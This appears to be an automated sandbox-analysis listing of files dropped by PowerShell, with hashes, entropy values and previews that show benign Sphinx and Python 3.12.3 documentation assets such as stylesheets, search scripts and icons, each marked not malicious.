    Preview:/*.. * classic.css_t.. * ~~~~~~~~~~~~~.. *.. * Sphinx stylesheet -- classic theme... *.. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE for details... *.. */....@import url("basic.css");..../* -- page layout ----------------------------------------------------------- */....html {.. /* CSS hack for macOS's scrollbar (see #1125) */.. background-color: #FFFFFF;..}....body {.. font-family: -apple-system, BlinkMacSystemFont, avenir next, avenir, segoe ui, helvetica neue, helvetica, Cantarell, Ubuntu, roboto, noto, arial, sans-serif;.. font-size: 100%;.. background-color: white;.. color: #000;.. margin: 0;.. padding: 0;..}....div.document {.. display: flex;.. background-color: white;..}....div.documentwrapper {.. float: left;.. width: 100%;..}....div.bodywrapper {.. margin: 0 0 0 230px;..}....div.body {.. background-color: white;.. color: #222222;.. padding: 0 20px 30px 20px;..}....div.footer {
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):3508
    Entropy (8bit):4.461888105802553
    Encrypted:false
    SSDEEP:
    MD5:0E50832AB2FD7BF08237149FF985E178
    SHA1:C6B09E18028914CF6718EE00E88EA7436C9C862A
    SHA-256:2D278D2F6F600CD2A0DDFBF8ADF71BF2DFBCC641FA1E8CE909B25723D16E3BA5
    SHA-512:E81B7DD87B9E9DA57507D516E5A7DE13E98298BBFADAE60A719102395163A887FAF6C571A4B488D278A5D6CCBA00A19E675502EBFED3A8D093C2B0E523A05AF9
    Malicious:false
    Reputation:unknown
    Preview:// ``function*`` denotes a generator in JavaScript, see.// https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/function*.function* getHideableCopyButtonElements(rootElement) {. // yield all elements with the "go" (Generic.Output),. // "gp" (Generic.Prompt), or "gt" (Generic.Traceback) CSS class. for (const el of rootElement.querySelectorAll('.go, .gp, .gt')) {. yield el. }. // tracebacks (.gt) contain bare text elements that need to be. // wrapped in a span to hide or show the element. for (let el of rootElement.querySelectorAll('.gt')) {. while ((el = el.nextSibling) && el.nodeType !== Node.DOCUMENT_NODE) {. // stop wrapping text nodes when we hit the next output or. // prompt element. if (el.nodeType === Node.ELEMENT_NODE && el.matches(".gp, .go")) {. break. }. // if the node is a text node with content, wrap it in a. // span element so that we
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):28
    Entropy (8bit):4.06610893983748
    Encrypted:false
    SSDEEP:
    MD5:0000E4EA89F1C9F5739B7F36D88477DA
    SHA1:B9D1252F212DEFA2013AB47A83A1D0217155888C
    SHA-256:F3D74D09F9A0D5C08E9EF211AFED3397ACE994A39748325AE53BEA62124348B1
    SHA-512:80A17368195F3E41B48EE0B86D94839943CDF7C1AECE0D6D1524D297B25837589CAC78B26A497336A3997542BF801791648A71CFB80EDB018C32E3F179047E8F
    Malicious:false
    Reputation:unknown
    Preview:@import url("classic.css");.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):4472
    Entropy (8bit):5.0585230241764325
    Encrypted:false
    SSDEEP:
    MD5:C11D2DE693BE9FB96BC1C8A9A35D4002
    SHA1:C577AFA99AF5347B1E4F0E350A07E5D400464A99
    SHA-256:3D62B81F63B0418A39A8F5A323203D88DDAFC8C5226F86D311970025D86D7B6C
    SHA-512:E2B65FC609C4DB774C58881347BEF0B3C80E4A2B3A048D2935EC688CC6AAFA4B4A5DD3619953128AE60B6896134C0FC00506E78D2E4169A14F32AEE9A4C877A8
    Malicious:false
    Reputation:unknown
    Preview:/*. * doctools.js. * ~~~~~~~~~~~. *. * Base JavaScript utilities for all Sphinx HTML documentation.. *. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */."use strict";..const BLACKLISTED_KEY_CONTROL_ELEMENTS = new Set([. "TEXTAREA",. "INPUT",. "SELECT",. "BUTTON",.]);..const _ready = (callback) => {. if (document.readyState !== "loading") {. callback();. } else {. document.addEventListener("DOMContentLoaded", callback);. }.};../**. * Small JavaScript module for the documentation.. */.const Documentation = {. init: () => {. Documentation.initDomainIndexTable();. Documentation.initOnKeyListeners();. },.. /**. * i18n support. */. TRANSLATIONS: {},. PLURAL_EXPR: (n) => (n === 1 ? 0 : 1),. LOCALE: "unknown",.. // gettext and ngettext don't access this so that the functions. // can safely bound to a different name (_ = Documentation.gettext). gettext: (string) => {. const translated = Docume
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):341
    Entropy (8bit):4.998813699121702
    Encrypted:false
    SSDEEP:
    MD5:0EDC96A6A4FB357EBF75A6E7E1E20900
    SHA1:10F0C8971B7EC6D3A24F3B7B60ADCA0A7574A067
    SHA-256:9D21CA41024B088E7DC1F227CEF5FC5AB20C2F05F049EEF961DA09234E24A148
    SHA-512:25E56DCB680AF9E4D79637259BC0D04832CEAC60175717C881AAB32F8FAD8F35D16B8FE182F6F711EAFDD20818FB2FEE1444323D8B1CB586F25FB577CE668F2C
    Malicious:false
    Reputation:unknown
    Preview:const DOCUMENTATION_OPTIONS = {.. VERSION: '3.12.3',.. LANGUAGE: 'en',.. COLLAPSE_INDEX: false,.. BUILDER: 'html',.. FILE_SUFFIX: '.html',.. LINK_SUFFIX: '.html',.. HAS_SOURCE: true,.. SOURCELINK_SUFFIX: '.txt',.. NAVIGATION_WITH_KEYS: false,.. SHOW_SEARCH_SUMMARY: true,.. ENABLE_SEARCH_SHORTCUTS: true,..};
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):286
    Entropy (8bit):6.982817860477681
    Encrypted:false
    SSDEEP:
    MD5:BA0C95766A77A6C598A7CA542F1DB738
    SHA1:51FD2E4EC924E822C5D434FA98CCFC70C30380F5
    SHA-256:5C4BC9A16AEBF38C4B950F59B8E501CA36495328CB9EB622218BCE9064A35E3E
    SHA-512:0426FE38986987303F6076D52EF28BDCF4F3AC2858E0780557471F2D0F3E055745687D0905357C6A0CD7E6F5DD1EF8FE82FF311E44499F89AB6299A41B67D8E6
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR................a....IDATx....R.....){.l. ....f.=@....:...3..~.......rX$A...X-.D.~............(.P.%......8<<.9::.....P...O&.$.....l~.X.....&....EW..^4.w.Q}......^.............i....0/H/.@F).Dzq+..j..[..SU5......h../.oY..G&Lfs|......{.....3%.U.+S..`AF.....IEND.B`.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):146694
    Entropy (8bit):4.801719470012649
    Encrypted:false
    SSDEEP:
    MD5:FFC141EE0F44F0B1570B67A99E6CC374
    SHA1:805534F98BCE92756D242B5FCE554975194A5BDD
    SHA-256:2D9C095B96F798D19AC468627BD066CE4E4CF5DCBEF43664E9943257B66CA99B
    SHA-512:42B9DBAFCBE2347768BC7375F11D1DDC4F95F6F1DA71B2AF5AD156D1066053BB704B585FC4547605A4FF73FA9FFE3AD8F7C8DF5AC577673AFFAB9957C6625DDB
    Malicious:false
    Reputation:unknown
    Preview:{">>>": {"title": ">>>", "body": "<main>\n<dd><p>The default Python prompt of the interactive shell. Often seen for code\nexamples which can be executed interactively in the interpreter.</p>\n</dd>\n</main>\n"}, "...": {"title": "...", "body": "<main>\n<dd><p>Can refer to:</p>\n<ul class=\"simple\">\n<li><p>The default Python prompt of the interactive shell when entering the\ncode for an indented code block, when within a pair of matching left and\nright delimiters (parentheses, square brackets, curly braces or triple\nquotes), or after specifying a decorator.</p></li>\n<li><p>The <a class=\"reference internal\" href=\"library/constants.html#Ellipsis\" title=\"Ellipsis\"><code class=\"xref py py-const docutils literal notranslate\"><span class=\"pre\">Ellipsis</span></code></a> built-in constant.</p></li>\n</ul>\n</dd>\n</main>\n"}, "2to3": {"title": "2to3", "body": "<main>\n<dd><p>A tool that tries to convert Python 2.x code to Python 3.x code by\nhandling most of the incompatibiliti
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):4957
    Entropy (8bit):4.706694430371463
    Encrypted:false
    SSDEEP:
    MD5:1F1730A3FF00B31B7C2453000CE4F5CB
    SHA1:D39E65623BCF26D762FC67A82DC97526D0BF3798
    SHA-256:A889DDDC136E6E32DB953C4588618ECD9D482BF1FBACE3168F5008BB868C33E7
    SHA-512:C525A0185430C6B287BC25FFE8FA6763ECD9963470A8930CD461FF675C2ED8E6FC672FB69824E155BF209240B9729BCE40285F376A04478D04D1946149CC6349
    Malicious:false
    Reputation:unknown
    Preview:/*.. * language_data.js.. * ~~~~~~~~~~~~~~~~.. *.. * This script contains the language-specific data used by searchtools.js,.. * namely the list of stopwords, stemmer, scorer and splitter... *.. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE for details... *.. */....var stopwords = ["a", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "near", "no", "not", "of", "on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with"];....../* Non-minified version is copied as a separate JS file, is available */..../**.. * Porter Stemmer.. */..var Stemmer = function() {.... var step2list = {.. ational: 'ate',.. tional: 'tion',.. enci: 'ence',.. anci: 'ance',.. izer: 'ize',.. bli: 'ble',.. alli: 'al',.. entli: 'ent',.. eli: 'e',.. ousli: 'ous',.. ization: 'ize',.. ation: 'ate',.. ator: 'ate',.. alism: 'al',.. iveness
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):2137
    Entropy (8bit):4.61501159702344
    Encrypted:false
    SSDEEP:
    MD5:4769AC04FE66AE519264AB18F6B85993
    SHA1:8DB5C986C6C4602B11B4603034B6BDB954FCA60F
    SHA-256:266ACA0F4F3FE828828101F7D80B3D020892895FAD8757D922756B9930A28730
    SHA-512:15CA50998BBC89FB7D2522DF44800101615D93FF3D7684C6FC20389C0E8DB5A9AB7E98C1E8E041A9EF61E56BC82794A1B0F436B0311B421BBF3135AFB494A11F
    Malicious:false
    Reputation:unknown
    Preview:document.addEventListener("DOMContentLoaded", function () {.. // Make tables responsive by wrapping them in a div and making them scrollable. const tables = document.querySelectorAll("table.docutils"). tables.forEach(function(table){. table.outerHTML = '<div class="responsive-table__container">' + table.outerHTML + "</div>". }).. const togglerInput = document.querySelector(".toggler__input"). const togglerLabel = document.querySelector(".toggler__label"). const sideMenu = document.querySelector(".menu-wrapper"). const menuItems = document.querySelectorAll(".menu"). const doc = document.querySelector(".document"). const body = document.querySelector("body").. function closeMenu() {. togglerInput.checked = false. sideMenu.setAttribute("aria-expanded", "false"). sideMenu.setAttribute("aria-hidden", "true"). togglerLabel.setAttribute("aria-pressed", "false"). body.style.overflow = "visible". }. function openMe
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 11 x 11, 8-bit grayscale, non-interlaced
    Category:dropped
    Size (bytes):90
    Entropy (8bit):5.021779901931872
    Encrypted:false
    SSDEEP:
    MD5:36B1A4B05451C7ACDE7CED60B2F6BC21
    SHA1:89F4178F1F917AD03726F307FE6D2E28D6A1706A
    SHA-256:47E7FC50DB3699F1CA41CE9A2FFA202C00C5D1D5180C55F62BA859B1BD6CC008
    SHA-512:EAD39ADF0CBB8BF803977F277632B42C62AAEEDA8E4A57DD263AAA0851562BA27F069320B2EB29B7ED93D1682A965ECD61826BDF1CB2E15A68F08AE88DDD05CF
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR...............(....!IDATx.c8...g>@.;(..!.&...........].f2n..N....IEND.B`.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):14572
    Entropy (8bit):7.96364542989978
    Encrypted:false
    SSDEEP:
    MD5:971B2D0C44CB83CBD37FDCFD4E50E794
    SHA1:D7C47BAE9A65CAD00E0A8B0FA0746B18FAEFDABA
    SHA-256:AACC80A7392C51D971A98EF3DAE6C908D9A14229615C83A5DB97521DC4102C1E
    SHA-512:E70F5F50BE8A932B73F973BC390804DD747367B8AC65E94B2AD140E3B5D4729AAC31FF0FA7070F895E5676555E3F87651FEDC0A394EDC9A3979D7C18B76D07E7
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR..............X....8.IDATx..y.\U...]{.SCWw.....2&....E.... .....-2..L...|.hu.LI..T.=.c.U.4....@.)Q.....C.S.....TUW..uNM].].....>g..]k.Mh...q.=...4.....q4.. ..q4.i....H-.L.(h.....-T.x.{~.-.H..G..O0.....L<...3..b43...!f.....df.D.........61.....3......H...oi.o......R..O....1.R4*.@..m......O.h......n......j.O[.z...>.s....-.e...yo0.`pD.&.i..03....5....`....3.v.is%01.)..d.. r.f&....R......]D.&C.I..4..d.m...k..Gn>o0...E.F........$.g...%.....0.'..?....k>R..D..].&..k..v..v.Z...L.`d...C.....`b..g..<..3s.g"fh@.L...0...G.........ZA..._.Bna.G.V....Dw..~...9....y..LU0XtwP......L.F..O..2..#.....c...Z.&rI...k.....cH.}..sx.ap..'g0. .s..9......A.;b.....,.4@..H@.I@.-.|....u.o...{..nx.).H{{..\=...<c.I`:...D 8...,...Y+rMX.3.{..c.....-<.1t...;...f.#1..0.$d...H..~...?..!.z.bN......wu..........l..T.<ZH.v*....f..1.. oWp.F.'.*.s..%.......0.a(;. q.J.}w......@g'....L..<.e....O..uF t.vl8VB.K.H'.e....Jy.c...{.<....23k......S;...Ywc..#.m..IzD.Q.......2.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):546
    Entropy (8bit):5.147712648147712
    Encrypted:false
    SSDEEP:
    MD5:FE5C6EBA8E34208205DCA55FA0281322
    SHA1:1400F18FE4B664BE2CBE153454BD541FD2869764
    SHA-256:44E2A28AAF473DCCF6AA6FB71681683524C4C6384CEA6AD4C2F1708E2121AB28
    SHA-512:E814976CC74A51D034A1988DCAE06B69A0920E7CD90697C4D4D047F32AE526F6472FB3AAB85C1B81300CFEE2B2E99E29A0BAE530A4ADFEC10E5ABDFDC84D0BEE
    Malicious:false
    Reputation:unknown
    Preview:<?xml version="1.0" encoding="UTF-8"?>..<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">.. <ShortName>Python</ShortName>.. <Description>Search Python 3.12.3 documentation</Description>.. <InputEncoding>utf-8</InputEncoding>.. <Url type="text/html" method="get".. template="https://docs.python.org/3.12/search.html?q={searchTerms}"/>.. <LongName>Python 3.12.3 documentation</LongName>..<Image height="16" width="16" type="image/x-icon">https://www.python.org/images/favicon16x16.ico</Image>..</OpenSearchDescription>
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 11 x 11, 8-bit grayscale, non-interlaced
    Category:dropped
    Size (bytes):90
    Entropy (8bit):4.968947818574501
    Encrypted:false
    SSDEEP:
    MD5:0D7849FD4D4148B7F78CAB60A087633A
    SHA1:365ABE63DE063EF2D97D3CAACC43512415B5A835
    SHA-256:54115199B96A130CBA02147C47C0DEB43DCC9B9F08B5162BBA8642B34980AC63
    SHA-512:5A34F6B12A015E45E5E3F785D42CF75BD6CB2850C3D0BD85FC59D8EDBAB0A6543A9BBDC0A8A29A7F30BAF96B7780D0F87247B90B9597ED0FD265A8E50612AC4C
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR...............(....!IDATx.c8...g>@.;([..[...U...@l...-!a...@.....IEND.B`.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):695
    Entropy (8bit):7.472596258888605
    Encrypted:false
    SSDEEP:
    MD5:A721FC7EC672275E257BBBFDE49A4D4E
    SHA1:88D4484552C4BEAC33D9A0848F523AAA66AAD78C
    SHA-256:AE173DC4842351FC1C8A551AFBDB58CB2B295490782130DAA4F359A6A80D7256
    SHA-512:7879A2953ACC3762C9ED55A19357BA12AD0B8BDB4E08DA9E3F21CB2853A481F8B1B4665FD03FB6F932F50450594193224CEEC10FE464B31936416E6584AEE9CD
    Malicious:false
    Reputation:unknown
    Preview:.PNG........IHDR................a....sRGB.........bKGD..............pHYs.................tIME.....8!.3'^...7IDAT8.e.OHUA...{.w{"....&hS.6.Z...mB*xP..MQ...A. ".)mZH... F.EF......2.....y3g........;.7..]....3i.s.v.M.....U.....}..\...x'.G.j.N,.Z.X.wQ....1 *.{.8k9.g.'v;..;.j./.t?|..[{\...N..j.E.%g..J=M}.W.....}x..v.^.{..Tn.J...N....\}..X.n..zw/..umY5;mg....Q."..SQ.}..,./.|..i...'}..S...@.B.................Wk..)`..j'..J/N.K@...e1M..FN,j}yhb.wp..+..K.S..Xb....@.:........_.=mU.5.EqR.'.4I.N.&t:..c.....j..l.....`zF..6..gu.G.f.pm".......J..(p..o.....q.G.0."....n...:".,.%8...4...+!..`..DoY-...4..,..5.3.......gob.;..3c..]..I...i...C....h.\nf]..................IEND.B`.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:SVG Scalable Vector Graphics image
    Category:dropped
    Size (bytes):2041
    Entropy (8bit):4.73858862289631
    Encrypted:false
    SSDEEP:
    MD5:0AC021A9F4CAE16DF1939CC056AEA75B
    SHA1:7AB79AB732C9EAC4421A2CE0628E6C09155E5CB2
    SHA-256:5865BE8BCC0AF888594903EA0112F6C8D923C5726C4081E8C856110CC7339CEF
    SHA-512:C64D320499DCAE4D3D94ED34FBB741A0335761726276F7FE07D6AD1971742F5F2F3DA25CABBA8A63A7B7BB6CF9CAC9AF71B902CEB03644D2BEE84A24ECFE23E5
    Malicious:false
    Reputation:unknown
    Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M7.90472 0.00013087C7.24498 0.00316295 6.61493 0.0588153 6.06056 0.15584C4.42744 0.441207 4.13093 1.0385 4.13093 2.14002V3.59479H7.99018V4.07971H4.13093H2.68259C1.56098 4.07971 0.578874 4.7465 0.271682 6.01495C-0.0826595 7.4689 -0.0983765 8.37618 0.271682 9.89434C0.546011 11.0244 1.20115 11.8296 2.32275 11.8296H3.64965V10.0856C3.64965 8.82574 4.75178 7.71441 6.06056 7.71441H9.91531C10.9883 7.71441 11.8449 6.84056 11.8449 5.77472V2.14002C11.8449 1.10556 10.9626 0.328486 9.91531 0.15584C9.25235 0.046687 8.56447 -0.00290121 7.90472 0.00013087ZM5.81767 1.17017C6.2163 1.17017 6.54184 1.49742 6.54184 1.89978C6.54184 2.30072 6.2163 2.62494 5.81767 2.62494C5.41761 2.62494 5.0935 2.30072 5.0935 1.89978C5.0935 1.49742 5.41761 1.17017 5.81767 1.17017Z" fill="url(#paint0_linear)"/>.<path d="M12.3262 4.07971V5.77472C12.3262 7.08883 11.1998 8.19488 9.9153 8.19488H6.06055C5.00466 8.19488 4.13092 9
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):13101
    Entropy (8bit):4.713844241406214
    Encrypted:false
    SSDEEP:
    MD5:2671E5A932CAF4097FD96F2CA64DDAA9
    SHA1:815ECD07AE7CDFE81E82E7EB93337D8866C5AC60
    SHA-256:F3AB1CDBEBD0AB51AA0CAEA1D09C6482FF6E58ED596B9E3BAA0FE47B029FEBA6
    SHA-512:E3B0E633F206FE416BE283B698099C85F1D800D613365A549211339D5C91008E9E2A51D57035B70B896696702C20783C715F619F3F7E6AAE0D63FFB305DD9BAB
    Malicious:false
    Reputation:unknown
    Preview:@import url('classic.css');../* unset some styles from the classic stylesheet */.div.document,.div.body,.div.related,.div.body h1,.div.body h2,.div.body h3,.div.body h4,.div.body h5,.div.body h6,.div.sphinxsidebar a,.div.sphinxsidebar p,.div.sphinxsidebar ul,.div.sphinxsidebar h3,.div.sphinxsidebar h3 a,.div.sphinxsidebar h4,..menu a,..menu p,..menu ul,..menu h3,..menu h3 a,..menu h4,.table.docutils td,.table.indextable tr.cap,.pre {. background-color: inherit;. color: inherit;.}../* Add underlines to links */.a[href] {. text-decoration: underline 1px;.}../* Increase the underline offset for code to avoid obscuring underscores */.a[href]:has(> code) {. text-underline-offset: 0.25em;.}../* No underline for navigation */.a.headerlink,.div.genindex-jumpbox a,.div.modindex-jumpbox a,.div#search-results a,.div.sphinxsidebar a,.div.toctree-wrapper a,.div[role=navigation] a,.table.contentstable a,.table.indextable a {. text-decoration: none;.}../* Except when hovered */.div.gen
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):2371
    Entropy (8bit):5.01984802023824
    Encrypted:false
    SSDEEP:
    MD5:DA320D3DE070F942BDAD563895E7636F
    SHA1:FD8746DC6D18E076D66AA4C2B6B171056BEEC703
    SHA-256:84B40EBB0CD283D71C30C96E60FAC3DD9D8C738C813613E99146F4D9AE1874E0
    SHA-512:2491150B7BDAA4D4693246B25416E2285C43041A45E210777B16B97013544C3B00F7BEEDE4335287D38957BB05C23BA3F5996B3AAC504B7CE76B6F964E2034C6
    Malicious:false
    Reputation:unknown
    Preview:./* Browser elements */.:root {. scrollbar-color: #616161 transparent;. color-scheme: dark;.}..html,.body {. background-color: #222;. color: rgba(255, 255, 255, 0.87);.}..div.related {. color: rgba(255, 255, 255, 0.7); /* classic overwrite */. border-color: #424242;.}../* SIDEBAR */.div.sphinxsidebar, .menu-wrapper {. background-color: #333;. color: inherit;.}..#sidebarbutton {. /* important to overwrite style attribute */. background-color: #555 !important;. color: inherit !important;.}..div.sidebar, aside.sidebar {. background-color: #424242;. border-color: #616161;.}../* ANCHORS AND HIGHLIGHTS */.div.body a {. color: #7af;.}..div.body a:visited {. color: #09e;.}..a.headerlink:hover {. background-color: #424242;.}..div.related a {. color: currentColor;.}..div.footer,.div.footer a {. color: currentColor; /* classic overwrites */.}..dt:target,.span.highlighted {. background-color: #616161;.}...footnote:target {. background-col
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):4976
    Entropy (8bit):5.069794660694964
    Encrypted:false
    SSDEEP:
    MD5:0FDF7C5DDE08416916309ED897659073
    SHA1:351408174FDE3CC5650AF098B603C9B9299DE40B
    SHA-256:88B3629FD3D7A222217C936818F992B0B6C40DDBB3266B2FA6D56E2A58849B11
    SHA-512:F276BCC4B4F07BB85B1BD769B3129AE7B37E22B5CE420A058000C7B1F708F4478DF3A84A4896369CC35924A3BAE384FFFF8922ADC937E3828F7F453FEB2F0D1E
    Malicious:false
    Reputation:unknown
    Preview:pre { line-height: 125%; }..td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }..span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }...highlight .hll { background-color: #ffffcc }...highlight { background: #f8f8f8; }...highlight .c { color: #3D7B7B; font-style: italic } /* Comment */...highlight .err { border: 1px solid #FF0000 } /* Error */...highlight .k { color: #008000; font-weight: bold } /* Keyword */...highlight .o { color: #666666 } /* Operator */...highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */...highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */...highlight .cp { color: #9C6500 } /* Comment.Preproc */...h
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):5139
    Entropy (8bit):5.001030227512549
    Encrypted:false
    SSDEEP:
    MD5:6BAB1AE2E37B08D2BF857361DD07958C
    SHA1:D9233B5F65A1EBF333EE431A25FE257117C46899
    SHA-256:B228D5A2C3B6A621F4D8573F755B74C33345C33A009BDBE0C04B855D656AC7A0
    SHA-512:93895E3C19A26857AD8955258ABF22A1D04A586D5BF48E04A46094F1545653A671BABFE40B2E0B2DFDCE3E359D8A215906A2A4765A9B62435AF88C6EDF50B3D9
    Malicious:false
    Reputation:unknown
    Preview:pre { line-height: 125%; }..td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }..span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }...highlight .hll { background-color: #49483e }...highlight { background: #272822; color: #f8f8f2 }...highlight .c { color: #959077 } /* Comment */...highlight .err { color: #ed007e; background-color: #1e0010 } /* Error */...highlight .esc { color: #f8f8f2 } /* Escape */...highlight .g { color: #f8f8f2 } /* Generic */...highlight .k { color: #66d9ef } /* Keyword */...highlight .l { color: #ae81ff } /* Literal */...highlight .n { color: #f8f8f2 } /* Name */...highlight .o { color: #ff4689 } /* Operator */...highlight .x { color: #f8f8f2 } /
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):559
    Entropy (8bit):4.771802759201691
    Encrypted:false
    SSDEEP:
    MD5:E7FFE039348E5AE047B97F246579B381
    SHA1:301A4DD0FA54530684DE7CC7A863D27C449BA43C
    SHA-256:0F0595EF5B2C2AFAF36A03DE9CFEF22EF15009DCAA1498AB6C19353C546F5680
    SHA-512:A6FF347A7C874B322922C63FE1385615C0853E9202B95DF07D891A39032FF830956FBF500387D23C8C190FB14408A20032AD8F2717DE33771C8CE7BFD8AD0775
    Malicious:false
    Reputation:unknown
    Preview:function isInputFocused() {. const activeElement = document.activeElement;. return (. activeElement.tagName === 'INPUT' ||. activeElement.tagName === 'TEXTAREA' ||. activeElement.isContentEditable. );.}..document.addEventListener('keydown', function(event) {. if (event.key === '/') {. if (!isInputFocused()) {. // Prevent "/" from being entered in the search box. event.preventDefault();.. // Set the focus on the search box. const searchBox = document.getElementById('search-box');. searchBox.focus();. }. }.});.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):18732
    Entropy (8bit):4.823676806040573
    Encrypted:false
    SSDEEP:
    MD5:98B20BA46411DEEFA7EFA94524097C2C
    SHA1:641A3FA218CE4DA2A0A8FE282473D041DB73DC15
    SHA-256:3012A521CA4C32C56939AF6A67E4F4B8F5FB80C2952E19CBF2FCBD697C4BB37D
    SHA-512:4D6A716824F08F73178BF1694A0949ED18140D28C045FC0FFE14175B2921A3699541236A98ED187B02789D3DE8B4C6228ADAF1E28267EF882F9AF082B26AA263
    Malicious:false
    Reputation:unknown
    Preview:/*. * searchtools.js. * ~~~~~~~~~~~~~~~~. *. * Sphinx JavaScript utilities for the full-text search.. *. * :copyright: Copyright 2007-2023 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */."use strict";../**. * Simple result scoring code.. */.if (typeof Scorer === "undefined") {. var Scorer = {. // Implement the following function to further tweak the score for each result. // The function takes a result array [docname, title, anchor, descr, score, filename]. // and returns the new score.. /*. score: result => {. const [docname, title, anchor, descr, score, filename] = result. return score. },. */.. // query matches the full name of an object. objNameMatch: 11,. // or matches in the last dotted part of the object name. objPartialMatch: 6,. // Additive scores depending on the priority of the object. objPrio: {. 0: 15, // used to be importantResults. 1: 5, // used to be objectResults. 2: -5,
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:Unicode text, UTF-8 text, with CRLF line terminators
    Category:dropped
    Size (bytes):2697
    Entropy (8bit):4.868494495669144
    Encrypted:false
    SSDEEP:
    MD5:DDE60BA867F1238B1446B2049901C00A
    SHA1:ED59575D1E84E1B7EA5A1C2CB1C766F32AC3B266
    SHA-256:99E280C84C96C9B75A134BF0F6AA2978BF1F65B7C72A9360D1CBC74BA54FB20A
    SHA-512:D14D8D7680F976598F4766C90839A1DBB756F48DF360955F8404F375BC6792C70183C37C0E9DDE305D100CBABD3A8BC3CC1373F2DC9E86582F724D93C0374C53
    Malicious:false
    Reputation:unknown
    Preview:/*.. * sidebar.js.. * ~~~~~~~~~~.. *.. * This file is functionally identical to "sidebar.js" in Sphinx 5.0... * When support for Sphinx 4 and earlier is dropped from the theme,.. * this file can be removed... *.. * This script makes the Sphinx sidebar collapsible... *.. * .sphinxsidebar contains .sphinxsidebarwrapper. This script adds.. * in .sphinxsidebar, after .sphinxsidebarwrapper, the #sidebarbutton.. * used to collapse and expand the sidebar... *.. * When the sidebar is collapsed the .sphinxsidebarwrapper is hidden.. * and the width of the sidebar and the margin-left of the document.. * are decreased. When the sidebar is expanded the opposite happens... * This script saves a per-browser/per-session cookie used to.. * remember the position of the sidebar among the pages... * Once the browser is closed the cookie is deleted and the position.. * reset to the default (expanded)... *.. * :copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS... * :license: BSD, see LICENSE f
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, ASCII text
    Category:dropped
    Size (bytes):5123
    Entropy (8bit):4.925223498348649
    Encrypted:false
    SSDEEP:
    MD5:0CD5EF6415C4AF33C6FAF75B54102CF5
    SHA1:7C8A5B8F897ED4E84ACD956218BEC2216F37C088
